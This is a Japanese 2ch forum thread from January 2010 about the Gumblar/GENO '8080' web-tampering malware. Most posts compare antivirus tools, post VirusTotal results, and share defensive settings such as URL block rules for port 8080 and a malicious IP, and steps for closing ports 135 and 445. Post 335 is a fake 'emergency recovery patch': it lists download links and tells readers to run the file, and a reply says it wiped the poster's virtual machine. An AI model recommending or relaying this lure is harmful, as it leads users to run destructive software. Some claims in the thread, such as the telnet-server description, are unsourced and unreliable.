230 : ガスクロマトグラフィー(埼玉県):2010/01/08(金) 18:06:51.82 ID:3AS7Uh7K
Aviraありがたい
231 : モンキーレンチ(catv?):2010/01/08(金) 18:09:59.36 ID:J0rbXE/p
232 : 蛍光ペン(長屋):2010/01/08(金) 18:10:36.07 ID:YDMEhqGi
>>231
FREEはノー
FREEはノー
234 : メスピペット(東日本):2010/01/08(金) 18:13:05.37 ID:ckOb/0qK
>>231
うちのFREEで検知した
うちのFREEで検知した
235 : メスピペット(東日本):2010/01/08(金) 18:15:27.46 ID:ckOb/0qK
ただ既に>>1のサイトは感染に気づいて修正した模様
236 : すりこぎ(アラバマ州):2010/01/08(金) 18:19:11.43 ID:TE0AHxjQ
ドクター中松のサイトが新種に感染ってマジ?
237 : おろし金(中部地方):2010/01/08(金) 18:32:05.66 ID:ljvBIV7x
宝箱が>>146で一杯になっちまった
238 : ファイル(神奈川県):2010/01/08(金) 18:39:20.67 ID:0N1RPMCW
なに、ガンプラの話をしにきた俺は帰ったほうがいいの?
HGUCガンブラスター (´・д・`)マダー?
一応行っておくけど今回のはUAC有効でも危ないからな
気をつけろよ
気をつけろよ
242 : 真空ポンプ(愛知県):2010/01/08(金) 18:51:56.42 ID:XrN2qS1/
警告音まじ心臓に悪すぎ・・・
何かこのスレでAviraが反応するんだけど
モッフルのサイト踏んでJava起動しちゃってたけど大丈夫かな
モッフルのサイト踏んでJava起動しちゃってたけど大丈夫かな
244 : そろばん(catv?):2010/01/08(金) 18:57:29.32 ID:5Zpgb1R+
ガンブラーに感染してるかどうかって
どうやってわかるの?
どうやってわかるの?
245 : 薬さじ(catv?):2010/01/08(金) 18:57:38.44 ID:2RR2xXkm
まだだ!たかがメインPCをやられただけだ!
246 : ウィンナー巻き(アラバマ州):2010/01/08(金) 19:00:10.80 ID:OzZuWk66
最近多すぎる
2ちゃん以外閲覧しない方がいいな
貼られたリンクも踏まない
2ちゃん以外閲覧しない方がいいな
貼られたリンクも踏まない
247 : 冷却管(広島県):2010/01/08(金) 19:01:48.41 ID:qrGub+6x
GENOって感染したらどうなんの?
248 : モンキーレンチ(大阪府):2010/01/08(金) 19:07:13.20 ID:xe588IAe
今回の8080系に感染するとtelnetサーバー立てられてリモートからPCのなか丸裸
IDは全部盗まれ、ショッピングで入力したならクレカもヤバい、悪人にPC貸し出した状態
IDは全部盗まれ、ショッピングで入力したならクレカもヤバい、悪人にPC貸し出した状態
249 : 冷却管(広島県):2010/01/08(金) 19:09:36.85 ID:qrGub+6x
リカバリインストールしたら駆除できる?
250 : モンキーレンチ(大阪府):2010/01/08(金) 19:11:22.44 ID:xe588IAe
クリーンインストールなら「たぶん」大丈夫、絶対は無い
でもそれしか回復方法は無い
でもそれしか回復方法は無い
251 : モンキーレンチ(catv?):2010/01/08(金) 19:36:12.87 ID:HTtcnhM9
>>248
ソース
ソース
252 : モンキーレンチ(大阪府):2010/01/08(金) 19:42:33.95 ID:xe588IAe
253 : 鉋(東京都):2010/01/08(金) 20:21:37.95 ID:9oh1Ia5x
>>252
telnetなんて一言も出てないようだが?
telnetなんて一言も出てないようだが?
最近のウイルスは総合型だからね
感染経路も感染後の行動も複雑
感染経路も感染後の行動も複雑
255 : モンキーレンチ(アラバマ州):2010/01/08(金) 21:12:52.08 ID:PO6/SsZN
カスペ、Avira、ノートン、マカフィー(GW)が新たに対応
ttp://www.virustotal.com/analisis/5d3877ab56662e71f04413c3619341ad0775634bc9d707a3f01f357a0d510699-1262952389
256 : 綴じ紐(茨城県):2010/01/08(金) 21:36:59.62 ID:T7myWTrZ
>>255
おれのDr.webが・・・
おれのDr.webが・・・
257 : ガムテープ(コネチカット州):2010/01/08(金) 21:38:40.98 ID:SXJSdjmi
Operaなら感染しないって本当?
259 : シャープペンシル(静岡県):2010/01/08(金) 22:50:12.54 ID:qyRql0/i
>>255
GWは事実上アヴィラだし
GWは事実上アヴィラだし
260 : モンキーレンチ(アラバマ州):2010/01/08(金) 23:11:18.46 ID:PO6/SsZN
>>259
調べたらいつのまにかWebWasherが買収されてたのか
調べたらいつのまにかWebWasherが買収されてたのか
261 : テープ(catv?):2010/01/08(金) 23:18:54.74 ID:cEc24PG4
,.へ
___ ム i
「 ヒ_i〉 ゝ 〈
ト ノ iニ(()
i { ____ | ヽ
i i /__, , ‐-\ i }
| i /(●) ( ● )\ {、 λ
ト−┤. / (__人__) \ ,ノ  ̄ ,!
i ゝ、_ | ´ ̄` | ,. '´ハ ,!
. ヽ、 `` 、,__\ /" \ ヽ/
\ノ ノ ハ ̄r/:::r―--―/::7 ノ /
ヽ. ヽ::〈; . '::. :' |::/ / ,. "
`ー 、 \ヽ::. ;:::|/ r'"
/ ̄二二二二二二二二二二二二二二二二ヽ
| 答 | M a c 大 勝 利 │|
\_二二二二二二二二二二二二二二二二ノ
___ ム i
「 ヒ_i〉 ゝ 〈
ト ノ iニ(()
i { ____ | ヽ
i i /__, , ‐-\ i }
| i /(●) ( ● )\ {、 λ
ト−┤. / (__人__) \ ,ノ  ̄ ,!
i ゝ、_ | ´ ̄` | ,. '´ハ ,!
. ヽ、 `` 、,__\ /" \ ヽ/
\ノ ノ ハ ̄r/:::r―--―/::7 ノ /
ヽ. ヽ::〈; . '::. :' |::/ / ,. "
`ー 、 \ヽ::. ;:::|/ r'"
/ ̄二二二二二二二二二二二二二二二二ヽ
| 答 | M a c 大 勝 利 │|
\_二二二二二二二二二二二二二二二二ノ
262 : 土鍋(dion軍):2010/01/09(土) 00:20:07.07 ID:ycjMYHFr
>>146
ブラクラ登録しようとしたら対象をファイルに保存をクリックしちまった
ブラクラ登録しようとしたら対象をファイルに保存をクリックしちまった
263 : はさみ(千葉県):2010/01/09(土) 00:20:33.28 ID:DM0nybdb
スレの勢いもやるきねーな
264 : はさみ(千葉県):2010/01/09(土) 00:21:13.98 ID:DM0nybdb
誤爆した
265 : 錐(神奈川県):2010/01/09(土) 00:22:18.29 ID:xbLk6A/z
デザイン改悪しないでMGナイチンゲール出せよ
266 : じゃがいも(関西):2010/01/09(土) 00:29:10.32 ID:FPgPdrn5
やはり携帯最強
267 : マイクロピペット(東日本):2010/01/09(土) 01:12:53.25 ID:j8fcVN5V
>>256
最新版
http://www.virustotal.com/jp/analisis/9e032adbec239b778cd4e14405953799185c6c7f1f35fe90531c944efc2f0787-1262966460
最新版
http://www.virustotal.com/jp/analisis/9e032adbec239b778cd4e14405953799185c6c7f1f35fe90531c944efc2f0787-1262966460
268 : ロープ(茨城県):2010/01/09(土) 03:05:07.44 ID:AOe+tnV+
>>268
我が家では、ずっと前から全てフリーだけど。
我が家では、ずっと前から全てフリーだけど。
>>268
冷静に考えたらwindows以外は無料ソフトだった
冷静に考えたらwindows以外は無料ソフトだった
>>271
それは知ってるがここは日本だしw
それは知ってるがここは日本だしw
http://news.goo.ne.jp/article/jiji/nation/jiji-100108X216.html
不正アクセス容疑で捜査=企業のHP改ざん−被害相談相次ぐ・警視庁
2010年1月8日(金)13:03
不正アクセス容疑で捜査=企業のHP改ざん−被害相談相次ぐ・警視庁
2010年1月8日(金)13:03
お前らいったいどこでウイルスについて学んだんだよ
教えt
教えt
275 : ガラス管(沖縄県):2010/01/09(土) 09:52:49.03 ID:RbBZ7cW9 BE:2362133298-2BP(1167)
276 : グラインダー(宮城県):2010/01/09(土) 10:19:03.69 ID:tBJfgGti
aviraの俺に隙はない
277 : ドライバー(埼玉県):2010/01/09(土) 10:34:32.77 ID:qRdfl21h
とりあえずjavascript無効にしたadobe Readerを緊急リリースして
その後で対策版を出せばいいのに悠長だよね
その後で対策版を出せばいいのに悠長だよね
>>275
どこからとっかかっていいか分からないんだけど
どこからとっかかっていいか分からないんだけど
279 : ガラス管(沖縄県):2010/01/09(土) 11:02:50.26 ID:RbBZ7cW9 BE:1837214887-2BP(1167)
280 : お玉(東京都):2010/01/09(土) 11:09:03.21 ID:FSzUW/4r
てすと
281 : カッター(東京都):2010/01/09(土) 11:12:48.88 ID:kvrFg2bT
変なものをスレに張らないでくれよ。
このスレ開いたらGDATAさんがブロックして見られなかったぞ。
このスレ開いたらGDATAさんがブロックして見られなかったぞ。
アンチvista厨のXP厨涙目wwwwwwwwwwwww
283 : 鉤(dion軍):2010/01/09(土) 11:19:15.64 ID:8vRQup75
Windows7販促キャンペーンか
>>283
MSの陰謀だったのか
MSの陰謀だったのか
7はともかく7のα版は・・・
286 : プライヤ(埼玉県):2010/01/09(土) 11:21:06.62 ID:6rqzUpu0
>>1
感染サイト?開いたけど何も反応しないじゃん。
感染サイト?開いたけど何も反応しないじゃん。
287 :刹那's☆ ◆SETSUNA2ArLs :2010/01/09(土) 11:21:52.29 ID:WfjBT3Hr BE:298206432-S★(504700)
おい!avast!駄目なのか??(^_^;)。 ...!教えろν速民
288 : クッキングヒーター(神奈川県):2010/01/09(土) 11:25:08.52 ID:wLTrRJWH
JavaScript使ってるPDFって見たことがないんだけど・・・
どんな感じなの
どんな感じなの
289 : ペーパーナイフ(catv?):2010/01/09(土) 11:31:00.62 ID:Pbvc+upq
>>287
今騒がれてる分の8080系は対応済
亜種が出てくるまでの話だけど
http://www.virustotal.com/analisis/cf4b42203397f1b333f0cf763a5aa081c3a8abc226af58e861f23880ac8c0a78-1262998068
今騒がれてる分の8080系は対応済
亜種が出てくるまでの話だけど
http://www.virustotal.com/analisis/cf4b42203397f1b333f0cf763a5aa081c3a8abc226af58e861f23880ac8c0a78-1262998068
290 : 石綿金網(神奈川県):2010/01/09(土) 11:32:03.33 ID:rBs90n99
アンチウイルスは最後の砦ですよ
291 :刹那's☆ ◆SETSUNA2ArLs :2010/01/09(土) 11:53:59.37 ID:WfjBT3Hr BE:3131163397-S★(504700)
>>289
どうやって対処するんすか!?
どんなふうにしていいかわからない…けど、頑張れば(^ω^)((爆))です
さすがのν速民でも駄目なのかうぬ!過去Jane誤作動したよなavast氏は
過去もあるし様子みすね〜な見解!とりまありがとでつ\(^O^)/@氏にはがばて
貰いたいでつ〜
292 : ペーパーナイフ(catv?):2010/01/09(土) 12:05:08.35 ID:Pbvc+upq
>>291
Avast!がうpだてされてれば、「今の段階の」8080はWebシールドが働いてブロックしてくれるけど、
↑に書いたように亜種が出るまでの話
対策:ブラウザをFireFoxにする
・FireFox:http://mozilla.jp/
・NoScript:https://addons.mozilla.jp/firefox/details/722
・Adblock Plus:https://addons.mozilla.jp/firefox/details/1865
ツール→アドオン→Adblock Plusの設定を開いて
*/94.247.2.195/* ←コピペで追加。
これ+>>109で対応
スペックに余裕があるなら
PCをサンドボックス化、再起動ですべてを“なかったこと”にできる「Returnil」
http://www.forest.impress.co.jp/docs/review/20091208_334128.html
それと綺麗な状態のうちに、丸ごとバックアップする手もあり
Windowsが起動したままの状態でハードディスクをまるごと
イメージ化できるフリーソフト「Macrium Reflect FREE Edition」
http://gigazine.net/index.php?/news/comments/20090206_macrium_reflect_free_edition/
あとはセキュ板の関連スレをチェックしてみ?
Avast!がうpだてされてれば、「今の段階の」8080はWebシールドが働いてブロックしてくれるけど、
↑に書いたように亜種が出るまでの話
対策:ブラウザをFireFoxにする
・FireFox:http://mozilla.jp/
・NoScript:https://addons.mozilla.jp/firefox/details/722
・Adblock Plus:https://addons.mozilla.jp/firefox/details/1865
ツール→アドオン→Adblock Plusの設定を開いて
*/94.247.2.195/* ←コピペで追加。
これ+>>109で対応
スペックに余裕があるなら
PCをサンドボックス化、再起動ですべてを“なかったこと”にできる「Returnil」
http://www.forest.impress.co.jp/docs/review/20091208_334128.html
それと綺麗な状態のうちに、丸ごとバックアップする手もあり
Windowsが起動したままの状態でハードディスクをまるごと
イメージ化できるフリーソフト「Macrium Reflect FREE Edition」
http://gigazine.net/index.php?/news/comments/20090206_macrium_reflect_free_edition/
あとはセキュ板の関連スレをチェックしてみ?
293 : 大根(アラビア):2010/01/09(土) 12:06:51.26 ID:xLTAcwf3
おい!アバストさんが騒いだぞ!
294 : スターラー(アラバマ州):2010/01/09(土) 12:09:26.27 ID:HpBQ53ce
ケロロスレ?
295 : ペーパーナイフ(catv?):2010/01/09(土) 12:18:40.03 ID:Pbvc+upq
>>293
>>23にスクリプトが貼られてるから=逆に考えればAvast!が有効ということ
(テキストだから悪さはしない 心配無用)
つかJaneのログフォルダは、Avast!に限らず除外設定にいれとこうな
>>23にスクリプトが貼られてるから=逆に考えればAvast!が有効ということ
(テキストだから悪さはしない 心配無用)
つかJaneのログフォルダは、Avast!に限らず除外設定にいれとこうな
296 : 定規(アラバマ州):2010/01/09(土) 12:20:06.27 ID:RB2+OewL
てかavastはまだ対応されてないの?
297 : 振り子(兵庫県):2010/01/09(土) 12:22:11.81 ID:OpBax4+Z
>>279
少し分かる俺は何なんだ?
少し分かる俺は何なんだ?
298 : ペーパーナイフ(catv?):2010/01/09(土) 12:22:32.98 ID:Pbvc+upq
299 :刹那's☆ ◆SETSUNA2ArLs :2010/01/09(土) 12:25:06.23 ID:WfjBT3Hr BE:1192824746-S★(504700)
300 : ファイル(茨城県):2010/01/09(土) 12:26:20.23 ID:VifxWfUT
具体的に何するウイルスだよ
Web改竄されてて俺のPCに何する訳?
Web改竄されてて俺のPCに何する訳?
301 : 定規(アラバマ州):2010/01/09(土) 12:30:05.42 ID:RB2+OewL
つかavastのオンアクセスの保護の設定って重いから全部普通にしてるんだけど、普通設定でも大丈夫かな?
高設定だと重いんだよね・・・
高設定だと重いんだよね・・・
302 : グラインダー(宮城県):2010/01/09(土) 12:39:26.47 ID:tBJfgGti
そもそもadobeのjavascriptって何してたの?
303 : ばんじゅう(宮城県):2010/01/09(土) 12:42:54.82 ID:QGuff+j8
readerのjavascriptをOFFにしても、おれみたいにacrobatは忘れちゃってる
可能性があるからな、お前らも気をつけろよ
可能性があるからな、お前らも気をつけろよ
304 : ミリペン(関西地方):2010/01/09(土) 12:46:12.60 ID:cEGswBFl
なぁ、俺の認識間違ってると思うんだが、情強のおまえらチェックしてくれ
俺が感染サイトを見る→俺が感染する→知らずに俺のサイトに俺がFTPでファイルうpする→勝手に改変コードを付け加えられる
→俺のサイトを見た人が感染
なの?
でもこれだとFTPのパスってもれてないよね
俺が感染サイトを見る→俺が感染する→知らずに俺のサイトに俺がFTPでファイルうpする→勝手に改変コードを付け加えられる
→俺のサイトを見た人が感染
なの?
でもこれだとFTPのパスってもれてないよね
305 : 巻き簀(大阪府):2010/01/09(土) 12:47:24.27 ID:uyvAvSWx
【レス抽出】
対象スレ:avast!のWebシールドでも反応しない新ガンブラーが登場
キーワード:ガンプラ
3 名前: ウケ(アラバマ州)[] 投稿日:2010/01/08(金) 02:45:14.02 ID:7h8EVcut
↓ガンプラかと思った
9 名前: ラベル(東京都)[] 投稿日:2010/01/08(金) 02:48:38.10 ID:1/1kKlEq
オススメのガンプラない?
239 名前: 時計皿(神奈川県)[sage] 投稿日:2010/01/08(金) 18:42:35.89 ID:h1Nohgr4
なに、ガンプラの話をしにきた俺は帰ったほうがいいの?
抽出レス数:3
対象スレ:avast!のWebシールドでも反応しない新ガンブラーが登場
キーワード:ガンプラ
3 名前: ウケ(アラバマ州)[] 投稿日:2010/01/08(金) 02:45:14.02 ID:7h8EVcut
↓ガンプラかと思った
9 名前: ラベル(東京都)[] 投稿日:2010/01/08(金) 02:48:38.10 ID:1/1kKlEq
オススメのガンプラない?
239 名前: 時計皿(神奈川県)[sage] 投稿日:2010/01/08(金) 18:42:35.89 ID:h1Nohgr4
なに、ガンプラの話をしにきた俺は帰ったほうがいいの?
抽出レス数:3
306 : スケッチブック(東京都):2010/01/09(土) 12:52:43.82 ID:iGD3z1KY
あぁ、何かしきりに21番と445番のポート叩いてくる奴らが居るなぁと思ったら、、、
こういうことか。面倒くさいなぁ
こういうことか。面倒くさいなぁ
307 : 定規(アラバマ州):2010/01/09(土) 12:54:17.89 ID:RB2+OewL
445番のポートってなんだっけ?
308 : スケッチブック(東京都):2010/01/09(土) 12:56:21.27 ID:iGD3z1KY
>>307
windowsのファイルプリンタ共有サービスとか
windowsのファイルプリンタ共有サービスとか
MSE最強ってことか
310 : 錘(東京都):2010/01/09(土) 12:56:50.48 ID:/4mbiOPn
AVAST!にファイルをトロイ扱いされて消されまくってからAVAST!恐くて使えない。
もう平気なのか?
もう平気なのか?
311 : ドライバー(長屋):2010/01/09(土) 12:57:23.57 ID:sSs+K87l BE:1194612285-PLT(12800)
312 : ガラス管(沖縄県):2010/01/09(土) 12:57:31.86 ID:RbBZ7cW9 BE:1476333959-2BP(1167)
正直445はルータで閉じてもいい気がする
313 : ドライバー(熊本県):2010/01/09(土) 12:58:43.00 ID:7iO+fC7T
ガンプラのスレじゃないのか・・・帰る
314 : グラインダー(宮城県):2010/01/09(土) 13:04:37.46 ID:tBJfgGti
>>303
ソフトも関連付けられない男の人って・・
ソフトも関連付けられない男の人って・・
315 : 絵具(関東地方):2010/01/09(土) 13:10:07.79 ID:IioKpeUH
>>310
いや今回の件で再導入したが、除外してなかったなんでもないファイルが消された、
いや今回の件で再導入したが、除外してなかったなんでもないファイルが消された、
316 : ドライバー(長屋):2010/01/09(土) 13:20:54.99 ID:sSs+K87l BE:358384043-PLT(12800)
317 : 錘(東京都):2010/01/09(土) 13:23:02.36 ID:/4mbiOPn
318 : ドライバー(長屋):2010/01/09(土) 13:24:47.10 ID:sSs+K87l BE:537575292-PLT(12800)
avastは対応してないってスレ立てだよね
対応しているのはどれ?
対応しているのはどれ?
・avast!用
webシールド→URLブロック
*:8080/*
・Adblock Plus用
|http://*:8080*
注:|http://*8080/*だと機能しない(後ろ側の / ←に注意)
上記は「http://〜〜:8080/〜」
というURLを使ってくる限りずっと有効。
webシールド→URLブロック
*:8080/*
・Adblock Plus用
|http://*:8080*
注:|http://*8080/*だと機能しない(後ろ側の / ←に注意)
上記は「http://〜〜:8080/〜」
というURLを使ってくる限りずっと有効。
321 : すりこぎ(山梨県):2010/01/09(土) 13:30:37.13 ID:GEWaBUZj
このスレを更新するたびに唸りをあげるavast!先生
感染したらどうなるんだよ
それはもう大変なことに
324 : クリップ(catv?):2010/01/09(土) 13:43:29.37 ID:m/dbXZL3
>>306>>320
危険ポートを閉じることでセキュリティを強化する。
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
危険ポートを閉じることでセキュリティを強化する。
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
325 : ビュレット(茨城県):2010/01/09(土) 15:07:08.29 ID:ORo2ZECy
>>324
そんなことしなくたってルータ入れれば簡単に鉄壁のFWできるぜ
そんなことしなくたってルータ入れれば簡単に鉄壁のFWできるぜ
326 : ボンベ(石川県):2010/01/09(土) 15:13:25.96 ID:5NbyV8Cq
いいかげんソフトウェアのアップデートはタスクで児童管理しろよ
327 : ニッパ(関西地方):2010/01/09(土) 15:15:53.13 ID:IB0CF2iY
avastってなんかわかりずらい
AVGにしたらいい感じになった
AVGにしたらいい感じになった
328 : ちくわ(dion軍):2010/01/09(土) 15:27:23.55 ID:sQLJ/tk2
>>326
通報した
通報した
ガンブラスターだと
信越放送ワロタww
331 : ドリルドライバー(東京都):2010/01/09(土) 18:50:20.65 ID:Y5y4FiuA
見事なタイミングで信越放送のページ開いたわw
そしてかたまったw
アクロバットリーダもメモリもりもり使用量増えたんで強制終了w
そしてかたまったw
アクロバットリーダもメモリもりもり使用量増えたんで強制終了w
>>145
これ踏んじゃったんだけどもう大丈夫なのか?
これ踏んじゃったんだけどもう大丈夫なのか?
333 : ビーカー(中部地方):2010/01/09(土) 22:11:58.72 ID:98q5RkV5
334 : ハンドニブラ(福井県):2010/01/09(土) 22:56:02.66 ID:xmeCBHLg
情強ならAcrobat ReaderやJavaのウェブブラウザplug-in機能は無効にしとけよ
335 : クリップ(catv?):2010/01/09(土) 23:01:49.33 ID:m/dbXZL3
【緊急】ガンブラー復旧パッチ使用手順。
http://mangakakouze.com/?security/news/view.cgi?type=gumblar
http://www14.atpages.jp/saba02site/files/fukkyuu0.zip
手順1
上記をダウンロードする。
手順2
ダウンロードしたファイルを任意のソフトで解凍する。
手順3
解凍したファイル内にある復旧パッチを実行すると、
「windowを復旧しますか?」とメッセージが出るので「yes」を選択します。
手順4
実行後、PCをセーフモードで再起動してください。
http://mangakakouze.com/?security/news/view.cgi?type=gumblar
http://www14.atpages.jp/saba02site/files/fukkyuu0.zip
手順1
上記をダウンロードする。
手順2
ダウンロードしたファイルを任意のソフトで解凍する。
手順3
解凍したファイル内にある復旧パッチを実行すると、
「windowを復旧しますか?」とメッセージが出るので「yes」を選択します。
手順4
実行後、PCをセーフモードで再起動してください。
336 : 土鍋(東京都):2010/01/09(土) 23:03:29.14 ID:T76tVhNO
>>335
古いエロゲを大量にぶっこんだVMware上のWindowsMeが消えた
古いエロゲを大量にぶっこんだVMware上のWindowsMeが消えた
337 : 足枷(不明なsoftbank):2010/01/09(土) 23:07:11.84 ID:xnkVMdE3
>>335
何度も同じものを貼るな
何度も同じものを貼るな
338 : スタンド(dion軍):2010/01/09(土) 23:16:30.30 ID:nSwfjhzi
フラッシュプレイヤーの無い俺に四角は無かった
339 : 蒸し器(東京都):2010/01/09(土) 23:17:01.53 ID:rRND75xR
MSのアンチウイルスってどう?使ってる人いる?
340 : 加速器(東日本):2010/01/09(土) 23:34:42.99 ID:h2asRdIe
MSEって更新もスキャンも時間かかるな
無料セキュリティーソフト使うの初めてだけど
どれもこんなもんなのか
無料セキュリティーソフト使うの初めてだけど
どれもこんなもんなのか
∩_∩
/ \ /\ 人人人人人人人人人人人人人人人人人人人人人人
| (゚)=(゚) | < トロイの木馬 Win32:Delf-MZG[Trj] を検出しました >
| ●_● | YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
/ ヽ
| 〃 ------ ヾ |
\__二__ノ
∩ ∩
| | | |
| |__| |
/ / ヽ \
/ (゚) (゚) |
| _○_ |
\__ヾ . .:::/__ノ
しw/ノ
___
/ ̄ヽ/ \ / \/ ̄ヽ 人人人人人人人人人人人人人
| / (゚) (゚) | | < プァーンプァーンプァーンプァーンプァーン>
| | 三 | | YYYYYYYYYYYYYYYYYYYY
\_ノ\_ __ノ\_ノ
| |
| |
(_,、_)
しwノ
/ \ /\ 人人人人人人人人人人人人人人人人人人人人人人
| (゚)=(゚) | < トロイの木馬 Win32:Delf-MZG[Trj] を検出しました >
| ●_● | YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
/ ヽ
| 〃 ------ ヾ |
\__二__ノ
∩ ∩
| | | |
| |__| |
/ / ヽ \
/ (゚) (゚) |
| _○_ |
\__ヾ . .:::/__ノ
しw/ノ
___
/ ̄ヽ/ \ / \/ ̄ヽ 人人人人人人人人人人人人人
| / (゚) (゚) | | < プァーンプァーンプァーンプァーンプァーン>
| | 三 | | YYYYYYYYYYYYYYYYYYYY
\_ノ\_ __ノ\_ノ
| |
| |
(_,、_)
しwノ
やべえな。しばらくリンク踏めないや。
avast!が/*LGPL*/のスクリプトに対応完了
avast!Anti-Virus Part120
http://pc11.2ch.net/test/read.cgi/sec/1261930389/631
631 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/09(土) 22:36:14
100109-0で/*LGPL*/に対応
JS:Illredir-C [Trj]で検知
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
http://pc11.2ch.net/test/read.cgi/sec/1261855221/952
952 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/09(土) 23:42:47
>>948
100109-0の定義データでavast!がLGPLに対応したみたいだ
手持ちの12個の検体すべてに反応するようになった
avast!Anti-Virus Part120
http://pc11.2ch.net/test/read.cgi/sec/1261930389/631
631 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/09(土) 22:36:14
100109-0で/*LGPL*/に対応
JS:Illredir-C [Trj]で検知
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
http://pc11.2ch.net/test/read.cgi/sec/1261855221/952
952 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/09(土) 23:42:47
>>948
100109-0の定義データでavast!がLGPLに対応したみたいだ
手持ちの12個の検体すべてに反応するようになった
344 : アリーン冷却器(沖縄県):2010/01/10(日) 03:40:09.47 ID:o+FvGDK+
これを期にカスペルスキーに乗り換えることにしました
プァーンプァーンで心臓が止まる心配はなくなりそうです
プァーンプァーンで心臓が止まる心配はなくなりそうです
345 : ホッチキス(大阪府):2010/01/10(日) 03:49:09.16 ID:S+d2/M90
>>344
無茶しやがって
無茶しやがって
346 : 霧箱(東日本):2010/01/10(日) 03:50:25.22 ID:KmypLAb0
そのプァーンプァーンって聞いてみたいw
347 : ビュレット(静岡県):2010/01/10(日) 03:51:53.11 ID:a3ueXY8l
心臓に悪い音だよな
348 : 鑿(神奈川県):2010/01/10(日) 03:52:59.92 ID:ddEqJ4lx
このスレを開いた瞬間avastが怒った
349 : ウケ(広島県):2010/01/10(日) 03:59:55.47 ID:8TzGn7kk
>>344
カスペも昔はひどかったぞ
カスペも昔はひどかったぞ
350 : ウケ(広島県):2010/01/10(日) 04:02:37.47 ID:8TzGn7kk
351 : グラフ用紙(東京都):2010/01/10(日) 04:05:08.07 ID:i4o12UOx
avast!は本当に心臓に悪い
http://www1.axfc.net/uploader/File/so/37144
http://www1.axfc.net/uploader/File/so/37144
352 : バールのようなもの(東京都):2010/01/10(日) 04:06:20.42 ID:LtbsLP2f
353 : アリーン冷却器(沖縄県):2010/01/10(日) 04:13:25.69 ID:o+FvGDK+
ガンプラって感染方法が脆弱性攻撃だろ?
普通のアンチウイルスじゃ汎用的に対応するのはそもそも無理で
脆弱性攻撃に特化したソフト入れとかないとヤバイぞ。
普通のアンチウイルスじゃ汎用的に対応するのはそもそも無理で
脆弱性攻撃に特化したソフト入れとかないとヤバイぞ。
355 : スプリッター(埼玉県):2010/01/10(日) 04:26:18.57 ID:f3PCMANF
vistaでマカフィーだから関係ないなよしガンプラの話をしよう
356 : 時計皿(東京都):2010/01/10(日) 04:32:30.72 ID:RKdUHhnM
avastは操作がわかりにくすぎる。
357 : コンニャク(dion軍):2010/01/10(日) 04:33:39.55 ID:Oo3Yp20u
古いosだからavastしか使えないや
358 : ニッパ(不明なsoftbank):2010/01/10(日) 04:34:27.26 ID:yoqGtUHk
こういうスレ開いて>>1のURLが紫だと何かこう
映画でスローモーションになった直後死ぬシーンを体験できるな
映画でスローモーションになった直後死ぬシーンを体験できるな
警告音が怖すぎるからtada.wavに変えた
361 : ホワイトボード(関東地方):2010/01/10(日) 12:28:24.26 ID:HXkmO9a3
>>4
ウイルス開発したのはおそらくKingsoftなんだろうな
ウイルス開発したのはおそらくKingsoftなんだろうな
362 : はさみ(アラバマ州):2010/01/10(日) 14:37:57.87 ID:n+ozIy49
>>343
新種(亜種)がもう既に出ている模様。
新種(亜種)がもう既に出ている模様。
363 : 二又アダプター(アラバマ州):2010/01/10(日) 16:32:12.16 ID:rXPvTZKK
avast!の本スレってIDが出ないせいかアンチが常駐してるのナw
364 : オープナー(catv?):2010/01/10(日) 16:35:37.87 ID:Zv9dMzwL
それAvast!に限った話じゃないよ
365 : ニッパ(長屋):2010/01/10(日) 16:38:59.22 ID:RVOekPgJ
セキュ板じゃ普通だな
366 : テープ(神奈川県):
Aviraのスレとか見てこいよw